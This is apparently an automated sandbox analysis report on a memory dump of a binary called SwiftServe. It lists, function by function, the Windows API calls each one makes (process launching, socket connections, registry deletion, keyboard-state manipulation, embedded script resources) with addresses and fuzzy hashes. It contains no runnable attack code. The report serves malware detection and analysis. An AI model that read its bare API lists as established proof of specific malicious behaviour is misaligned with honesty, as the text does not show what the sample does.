SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EABBFB

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 9d0ad61fcbe2f224aac5419204764ad4a1787c3ca8eda57808fc734c3c32e44f
Instruction ID: 981efbc63923412c60033055810e4fa5f0528c8f9f95111b4b2203557d2e5ede
Opcode Fuzzy Hash: 9d0ad61fcbe2f224aac5419204764ad4a1787c3ca8eda57808fc734c3c32e44f
Instruction Fuzzy Hash: 0C71BC34604244EFDB24DF55C894FBABBA9EF4E314F146059E986BB262C732BC50CB60

Function 00E9FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E9FB31
_memset.LIBCMT ref: 00E9FBFA
ShellExecuteExW.SHELL32(?), ref: 00E9FC3F

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

Part of subcall function 00E3436A: _wcscpy.LIBCMT ref: 00E3438D

GetProcessId.KERNEL32(00000000), ref: 00E9FCB6
CloseHandle.KERNEL32(00000000), ref: 00E9FCE5

Strings

@, xrefs: 00E9FC0E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 6970e63fe5a715cd38510a692e7f4cd0ec71836b63fa6694d946c3c6f14ce757
Instruction ID: aded114f1b04ce9ffa36081004b8365d9b2fcc8ff32f27b101f53f480f7de7db
Opcode Fuzzy Hash: 6970e63fe5a715cd38510a692e7f4cd0ec71836b63fa6694d946c3c6f14ce757
Instruction Fuzzy Hash: 6C61ACB5A006299FCF14EF64D4949AEBBF4FF08314F109569E816BB391CB30AD41CB94

Function 00E8174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00E8178B
GetKeyboardState.USER32(?), ref: 00E817A0
SetKeyboardState.USER32(?), ref: 00E81801
PostMessageW.USER32(?,00000101,00000010,?), ref: 00E8182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00E8184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00E81894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E818B7

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3b322e418b0ca1e0bb719c31c89984463dbc9481be0d99cee90f547fb69853f7
Instruction ID: 2e7f3e0a628f3079d91f4841a1f3e9a5492487281ec8b3b4d7bbbbe262b9c726
Opcode Fuzzy Hash: 3b322e418b0ca1e0bb719c31c89984463dbc9481be0d99cee90f547fb69853f7
Instruction Fuzzy Hash: 6451F5A09087D53EFB366224CC06BB67EED5B06308F0859CDE0DD658D2D299EC86D750

Function 00E81565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00E815A4
GetKeyboardState.USER32(?), ref: 00E815B9
SetKeyboardState.USER32(?), ref: 00E8161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E81646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E81663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E816A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E816C8

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: db2eb3a04cafd70ae1f9498479e74151846111f14e804848ec61b4e3a2821fc7
Instruction ID: b48db7c624c53539b743fdba6c74f141ef9c94eeddb233e09d642def7c63d68b
Opcode Fuzzy Hash: db2eb3a04cafd70ae1f9498479e74151846111f14e804848ec61b4e3a2821fc7
Instruction Fuzzy Hash: 815103A09447D13DFB36A324CC01BBA7EAD5B06308F0C55C9E0DD668C2D695EC9AE751

Function 00E85BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00E85BC5
_wcsncpy.LIBCMT ref: 00E85BFA
_wcsncpy.LIBCMT ref: 00E85C2C
_wcsncpy.LIBCMT ref: 00E85C5F
_wcsncpy.LIBCMT ref: 00E85CA1
_wcsncpy.LIBCMT ref: 00E85CDB
_wcsncpy.LIBCMT ref: 00E85D0A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 0c496f1071941e97f0984877e06ffd60292478b6df874d5d6dd11cf774a6aaa3
Instruction ID: 4e8a637454203815c779e82e48ddca81603b06a8b1674d9a3ef4d803df8ad9c7
Opcode Fuzzy Hash: 0c496f1071941e97f0984877e06ffd60292478b6df874d5d6dd11cf774a6aaa3
Instruction Fuzzy Hash: C5418DA6C2061875CB11FBB4DC4AACFB3F8AF04310F51A856F909F3161EA34A715C7A9

Function 00E83B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E84BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E83B8A,?), ref: 00E84BE0

Part of subcall function 00E84BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E83B8A,?), ref: 00E84BF9

lstrcmpiW.KERNEL32(?,?), ref: 00E83BAA
_wcscmp.LIBCMT ref: 00E83BC6
MoveFileW.KERNEL32(?,?), ref: 00E83BDE
_wcscat.LIBCMT ref: 00E83C26
SHFileOperationW.SHELL32(?), ref: 00E83C92

Strings

\*.*, xrefs: 00E83C20

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 5c896900627bb02e334f3539d8e68df851dabf61cc8bfa91a8dc7a80f59eb46a
Instruction ID: 7e5391d4113547aee532cbeb3aef1d61c43127381ce96f71f943712abcd44229
Opcode Fuzzy Hash: 5c896900627bb02e334f3539d8e68df851dabf61cc8bfa91a8dc7a80f59eb46a
Instruction Fuzzy Hash: EC418DB15083449AC752EF74D485ADBB7E8AF88740F40296EF48DE3191EB34D688C752

Function 00EA78B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EA78CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA7976
IsMenu.USER32(?), ref: 00EA798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EA79D6
DrawMenuBar.USER32 ref: 00EA79E9

Strings

0, xrefs: 00EA78C3

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 335b0e41bfa96e802db00cda584b4eb1daae5b8105bdd012c1496eed10058534
Instruction ID: 46164b32e1d667ad8489e242a45fe0285d05971b6a23a43e2b0f5c902cd11e8e
Opcode Fuzzy Hash: 335b0e41bfa96e802db00cda584b4eb1daae5b8105bdd012c1496eed10058534
Instruction Fuzzy Hash: 37414971A04248EFDB20DF54D884E9ABBF9FB4A314F05512AE985AB250C730FD54CFA0

Function 00EA1602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EA1631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EA165B
FreeLibrary.KERNEL32(00000000), ref: 00EA1712

Part of subcall function 00EA1602: RegCloseKey.ADVAPI32(?), ref: 00EA1678
Part of subcall function 00EA1602: FreeLibrary.KERNEL32(?), ref: 00EA16CA
Part of subcall function 00EA1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EA16ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 00EA16B5

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 7db8640196b52823d4590d1473877e0563904edbfa1d82885bbeff102d2fd04b
Instruction ID: 9ba3403fdcb41d6a97214ba927e89dd3b1d3ee13ebb512389ea7ddd181e6e211
Opcode Fuzzy Hash: 7db8640196b52823d4590d1473877e0563904edbfa1d82885bbeff102d2fd04b
Instruction Fuzzy Hash: 70313C71901109BFDB149B91DC85AFFB7BCEF0A344F0012AAF501F6150EA70AE499AA0

Function 00EA68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EA6911
GetWindowLongW.USER32(01845440,000000F0), ref: 00EA6944
GetWindowLongW.USER32(01845440,000000F0), ref: 00EA6979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EA69AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EA69D5
GetWindowLongW.USER32(?,000000F0), ref: 00EA69E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EA6A00

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b10531c6a6f77c7ddf3655a7250ccf7fad04fcedc8bd00b64f1e497299a9bcdc
Instruction ID: 232f1b49be1929927b19c7b556d499568bbe29230a05159bd6179f47ceff1d82
Opcode Fuzzy Hash: b10531c6a6f77c7ddf3655a7250ccf7fad04fcedc8bd00b64f1e497299a9bcdc
Instruction Fuzzy Hash: 61310430604194AFDB21CF19DC88F6637E1AB8B758F1921A4F554AF2A1CB71BC48DB51

Function 00E7E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E7E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E7E2F0
SysAllocString.OLEAUT32(00000000), ref: 00E7E2F3
SysAllocString.OLEAUT32(?), ref: 00E7E311
SysFreeString.OLEAUT32(?), ref: 00E7E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 00E7E33F
SysAllocString.OLEAUT32(?), ref: 00E7E34D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 030dd3abeffd5886371f5754b68f7e89b5c165d4dab6e38c4ab3b7c8fea93847
Instruction ID: 714e774a59a43fcef8ff4e11d1df5d77a27b38531fd697624e6de61a7a4afef8
Opcode Fuzzy Hash: 030dd3abeffd5886371f5754b68f7e89b5c165d4dab6e38c4ab3b7c8fea93847
Instruction Fuzzy Hash: D8218176604219BF9F10DFB9DC88CBB77ACEB0D364B048165FA18EB260D670AD458760

Function 00E9685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E98475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E984A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E968B1
WSAGetLastError.WSOCK32(00000000), ref: 00E968C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E968F9
connect.WSOCK32(00000000,?,00000010), ref: 00E96902
WSAGetLastError.WSOCK32 ref: 00E9690C
closesocket.WSOCK32(00000000), ref: 00E96935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E9694E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 1ab2554e5897382250103d58d477e5fd91c1a026c19c495dbf9c085b7dfede18
Instruction ID: 794e3d2779abb9d834c2385215bd14159ad38499b9e8e87ddb2af58c35ee0ce5
Opcode Fuzzy Hash: 1ab2554e5897382250103d58d477e5fd91c1a026c19c495dbf9c085b7dfede18
Instruction Fuzzy Hash: 9F31B371600218AFDF14AF64DC85FBE7BE9EB44724F04412AFD05BB291DB74AD048BA1

Function 00E7E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E7E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E7E3CB
SysAllocString.OLEAUT32(00000000), ref: 00E7E3CE
SysAllocString.OLEAUT32 ref: 00E7E3EF
SysFreeString.OLEAUT32 ref: 00E7E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 00E7E412
SysAllocString.OLEAUT32(?), ref: 00E7E420

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b6ce4ee80e42cbdd10b10a2fff03af3f5858fa2da33e2d54569d972a74cf85db
Instruction ID: 47e2187434bf41d0fb8fbf704c6dc9ad94a770d009749bdb00a3664a73beac84
Opcode Fuzzy Hash: b6ce4ee80e42cbdd10b10a2fff03af3f5858fa2da33e2d54569d972a74cf85db
Instruction Fuzzy Hash: BA214735605205AF9B109FA9DC88DAF77ECEB0D364B008665FA19EB360E670EC4587A4

Function 00EA7BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E22111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E2214F
Part of subcall function 00E22111: GetStockObject.GDI32(00000011), ref: 00E22163
Part of subcall function 00E22111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E2216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EA7C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EA7C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EA7C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EA7C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EA7C8A

Strings

Msctls_Progress32, xrefs: 00EA7C28

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 28196cc96b3fd44b7c1b5a406b66e37d8d2ce4f4e8fb36d8097e2088feaf47c6
Instruction ID: 86ff0fcf817c141a7f8fc4e6edda3cc22e991e4110ed545f77c4bff9d4c3ac5b
Opcode Fuzzy Hash: 28196cc96b3fd44b7c1b5a406b66e37d8d2ce4f4e8fb36d8097e2088feaf47c6
Instruction Fuzzy Hash: AA1193B2150219BEEF158F60CC85EE7BF5DEF0D7A8F015115BA44B6050C671AC21DBA0

Function 00E89ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E70817,?,?,00000000,00000000), ref: 00E89EE8
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E70817,?,?,00000000,00000000), ref: 00E89EFF
LoadResource.KERNEL32(?,00000000,?,?,00E70817,?,?,00000000,00000000,?,?,?,?,?,?,00E34A14), ref: 00E89F0F
SizeofResource.KERNEL32(?,00000000,?,?,00E70817,?,?,00000000,00000000,?,?,?,?,?,?,00E34A14), ref: 00E89F20
LockResource.KERNEL32(00E70817,?,?,00E70817,?,?,00000000,00000000,?,?,?,?,?,?,00E34A14,00000000), ref: 00E89F2F

Strings

SCRIPT, xrefs: 00E89EF5

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 5c2b22ee7dfe9cf33247dccb6b6f996e6af991fdab5436858f435031e5de9867
Instruction ID: 6c5e021215bc74a29669292a9b64a6d4260f1f003069b12490db4636dd565fae
Opcode Fuzzy Hash: 5c2b22ee7dfe9cf33247dccb6b6f996e6af991fdab5436858f435031e5de9867
Instruction Fuzzy Hash: BC115A70600700AFE7259B66DC48F377BB9EBC5B55F144268B619E6261DB71EC08C760

Function 00E49D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00E49D16

Part of subcall function 00E433B7: EncodePointer.KERNEL32(00000000), ref: 00E433BA
Part of subcall function 00E433B7: __initp_misc_winsig.LIBCMT ref: 00E433D5
Part of subcall function 00E433B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E4A0D0
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E4A0E4
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E4A0F7
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E4A10A
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E4A11D
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E4A130
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E4A143
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E4A156
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E4A169
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E4A17C
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E4A18F
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E4A1A2
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E4A1B5
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E4A1C8
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E4A1DB
Part of subcall function 00E433B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E4A1EE

__mtinitlocks.LIBCMT ref: 00E49D1B
__mtterm.LIBCMT ref: 00E49D24

Part of subcall function 00E49D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E49D29,00E47EFD,00EDCD38,00000014), ref: 00E49E86
Part of subcall function 00E49D8C: _free.LIBCMT ref: 00E49E8D
Part of subcall function 00E49D8C: DeleteCriticalSection.KERNEL32(0R,?,?,00E49D29,00E47EFD,00EDCD38,00000014), ref: 00E49EAF

__calloc_crt.LIBCMT ref: 00E49D49
__initptd.LIBCMT ref: 00E49D6B
GetCurrentThreadId.KERNEL32 ref: 00E49D72

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
